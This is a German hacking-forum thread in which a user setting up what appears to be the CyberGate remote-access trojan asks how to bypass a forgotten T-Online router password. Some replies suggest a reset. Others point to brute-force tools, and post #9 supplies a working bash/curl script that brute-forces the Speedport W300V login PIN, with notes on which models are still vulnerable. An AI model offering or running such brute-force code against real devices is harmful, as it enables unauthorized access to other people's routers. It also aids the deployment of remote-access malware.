Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 18
  1. #1
    Fortgeschrittener
    Registriert seit
    05.03.2010
    Beiträge
    33

    Ausrufezeichen T-Online PW vergessen !

    Hallo Leute ,

    Ich brauch für Cybergate ein paar freie Ports und als ich dann da sah dass ich ein pw eingeben muss hatte ich keinen plan . Ich habe es mit 0000 versucht und alle meine sachen durchstöbert ob ich das pw irgendwo liegen habe ...
    NIX

    Jetzt habe ich eine Frage wie ich das Passwort zurücksetzen kann oder umgehen kann ...?

    Ich hoffe ihr könnt mir helfen...

    MfG Cr0ssfire100

  2. #2
    Trojaner
    Registriert seit
    17.03.2009
    Beiträge
    61

    Standard

    Hallo!
    Ich geh jetzt mal davon aus das du das PW vom Router meinst!
    sofern du es nicht geändert hattest steht das PW unterm Router oder in der Beschreibung oder es ist eine Beilage, Aufkleber oder sonstiges zu finden wo es drauf steht, ansonsten gehts auch mit nem Reset oder ner BruteForce Attacke!
    ~mfg~

  3. #3
    Fortgeschrittener
    Registriert seit
    05.03.2010
    Beiträge
    33

    Standard

    Hast du nen brutefocer für mich der das pw vom router hackt...?

  4. #4
    Warez-Gott Avatar von hl2.exe
    Registriert seit
    06.11.2008
    Beiträge
    1.252

    Standard

    Drück den Reset Knopf...
    Gruß hl2.exe

    Zitat Zitat von Stammi Beitrag anzeigen
    Saying Java is nice because it works on all OS is like saying analsex is nice because it works on all genders.

  5. #5
    Fortgeschrittener
    Registriert seit
    05.03.2010
    Beiträge
    33

    Standard

    nee ... hat jemand nen bruteforcer...für mich ....? der sowas forced

  6. #6
    Linus Torvalds
    Registriert seit
    13.09.2007
    Beiträge
    1.104

    Standard

    Nicht immer ne sagen, lies dir mal den Post von Asmodeus durch. Das PW steht entweder am Router oder im Handbuch.

  7. #7
    Trojaner
    Registriert seit
    17.03.2009
    Beiträge
    61

    Standard

    Gebt mal! Gebt mal! ist immer schnell und anscheinend leicht geschrieben was hälst du davon mal oben auf SUCHE zu klicken dort Brutforce einzugeben und dir den Passenden Thread raus zu suchen?!
    Als kleine Hilfe sag ich dir noch wie das Tool heißt "Brutus AET2" is recht Simple das ding allerdings findest du auch HIER einige Hilfe stellungen wie es noch gehen könnte, dort steht auch das ein Reset des Routers das PW wieder zurück setzt, was im übrigen die einfachste Methode ist.
    ~mfg~

  8. #8
    Fortgeschrittener
    Registriert seit
    05.03.2010
    Beiträge
    33

    Standard

    Ich hab den Brutus AET2 schon aber wie mach ich dass der das bruteforced ....?

  9. #9
    Fortgeschrittener
    Registriert seit
    04.05.2010
    Beiträge
    32

    Standard

    welchen t-online router hast du denn? denn die neuen haben leider eine "server-site"-bruteforce-protection. kann dir nur sagen, dass auf jeden fall das modell speedport w300v noch bruteforcebar ist (mit default firmware).
    das würde auf minimaler ebene so aussehen:
    #!/bin/bash
    for (( c=13970; c<=99999; c++ ))
    do
    echo "Checking: $c" export i=`curl http://speedport.ip/cgi-bin/login.cgi --data pws=$c --referer "http://speedport.ip/hcti_start_passwort.stm" -# | grep /loginpserr.stm`
    if [[ $i != 'This document has moved <A HREF="http://speedport.ip/loginpserr.stm</A>.<P>' ]]; then
    echo "password found"
    exit
    fi
    clear
    done
    mit medusa den vorgang zu "threaden" wäre vorteilhaft, wobei die aktuelle version hierbei noch einen dummen redirect-bug aufweist. dann bleibt noch hydra, dass sich leider nicht so einfach kompilieren lässt unter einem aktuellen linux-system

  10. #10
    Fortgeschrittener
    Registriert seit
    05.03.2010
    Beiträge
    33

    Standard

    Ich hab den speedport w700v

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •